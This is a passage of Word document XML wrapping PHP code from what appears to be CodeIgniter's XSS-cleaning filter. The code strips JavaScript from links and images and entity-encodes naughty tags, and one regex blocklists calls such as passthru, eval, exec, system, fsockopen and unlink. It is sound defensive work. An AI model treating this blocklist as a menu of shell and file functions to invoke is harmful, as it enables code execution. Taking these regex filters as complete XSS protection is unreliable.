    <w:p w14:paraId="04BD5E7A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * but it is dog slow compared to these simplified non-capturing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE1ECC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * preg_match(), especially if the pattern exists in the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375065F5" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22642692" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Note: It was reported that not only space characters, but all in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77287C36" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * the following pattern can be parsed as separators between a tag name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67322744" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * and its attributes: [\d\s"\'`;,\/\=\(\x00\x0B\x09\x0C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A193B17" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * ... however, remove_invisible_characters() above already strips the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC9D9A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * hex-encoded ones, so we'll skip them below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36D1EB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54200E52" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD2337B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DF1C4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$original = $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D00BE40" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="308F731E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (preg_match('/&lt;a/i', $str))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4025E3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA1CBA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace_callback('#&lt;a(?:rea)?[^a-z0-9&gt;]+([^&gt;]*?)(?:&gt;|$)#si', array($this, '_js_link_removal'), $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CEC4D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357232EB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="79183F67" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (preg_match('/&lt;img/i', $str))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245510C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843124D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace_callback('#&lt;img[^a-z0-9]+([^&gt;]*?)(?:\s?/?&gt;|$)#si', array($this, '_js_img_removal'), $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021DEC1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B503B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="15F1B12A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (preg_match('/script|xss/i', $str))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742667E7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D0C59" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace('#&lt;/*(?:script|xss).*?&gt;#si', '[xss_clean]', $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F5685" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A272242" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A59F93E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>while ($original !== $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BBB35E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>unset($original);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCC994" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="782E27F3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF98C7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Sanitize naughty HTML elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A54DBBD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047ECC83" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * If a tag containing any of the words in the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7871D1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * below is found, the tag gets converted to entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB3298F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664E0320" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * So this: &lt;blink&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DADAF5" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Becomes: &amp;lt;blink&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0EDE44" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2171BACF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$pattern = '#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23186474" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.'&lt;((?&lt;slash&gt;/*\s*)((?&lt;tagName&gt;[a-z0-9]+)(?=[^a-z0-9]|$)|.+)' // tag start and name, followed by a non-tag character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D27407" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.'[^\s\042\047a-z0-9&gt;/=]*' // a valid attribute character immediately after the tag would count as a separator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BA3219" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// optional attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17209ECF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.'(?&lt;attributes&gt;(?:[\s\042\047/=]*' // non-attribute characters, excluding &gt; (tag close) for obvious reasons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597927BD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.'[^\s\042\047&gt;/=]+' // attribute characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F674E0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// optional attribute-value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE6879" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.'(?:\s*=' // attribute-value separator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292AE584" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.'(?:[^\s\042\047=&gt;&lt;`]+|\s*\042[^\042]*\042|\s*\047[^\047]*\047|\s*(?U:[^\s\042\047=&gt;&lt;`]*))' // single, double or non-quoted value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3C095" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.')?' // end optional attribute-value group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F006D9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.')*)' // end optional attributes group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4369E7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>.'[^&gt;]*)(?&lt;closeTag&gt;\&gt;)?#isS';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742B02B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="746D0EA6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Note: It would be nice to optimize this for speed, BUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7FCE1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//       only matching the naughty elements here results in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CFFE7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//       false positives and in turn - vulnerabilities!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C23BA6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E773D86" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F801EF0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$old_str = $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FAE30" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace_callback($pattern, array($this, '_sanitize_naughty_html'), $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3A2879" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F9D45" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>while ($old_str !== $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB14EE3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>unset($old_str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C26D1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0DD9FD4A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED6BFCB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Sanitize naughty scripting elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88CCA1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1EF5F6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Similar to above, only instead of looking for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE9E0E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * tags it looks for PHP and JavaScript commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15926810" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * that are disallowed. Rather than removing the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAEF3A6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * code, it simply converts the parenthesis to entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5E5DF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * rendering the code un-executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19106931" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A033BA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * For example:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>eval('some code')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED1F85" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Becomes:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>eval&amp;#40;'some code'&amp;#41;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEE697" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E410E50" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CEFCA3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'#(alert|prompt|confirm|cmd|passthru|eval|exec|expression|system|fopen|fsockopen|file|file_get_contents|readfile|unlink)(\s*)\((.*?)\)#si',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBED082" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'\\1\\2&amp;#40;\\3&amp;#41;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651D628" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C918895" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0631A3FC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="396CA495" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Same thing, but for "tag functions" (e.g. eval`some code`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2BE26" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// See https://github.com/bcit-ci/CodeIgniter/issues/5420</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56757F5C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A3D82A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>'#(alert|prompt|confirm|cmd|passthru|eval|exec|expression|system|fopen|fsockopen|file|file_get_contents|readfile|unlink)(\s*)`(.*?)`#si',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8CB1A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'\\1\\2&amp;#96;\\3&amp;#96;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02848A6D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BF333E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D9B7C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7DE292E0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//最终清理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7829895E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        //</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C87CDDC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        ////这增加了一点额外的预防措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F174B9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
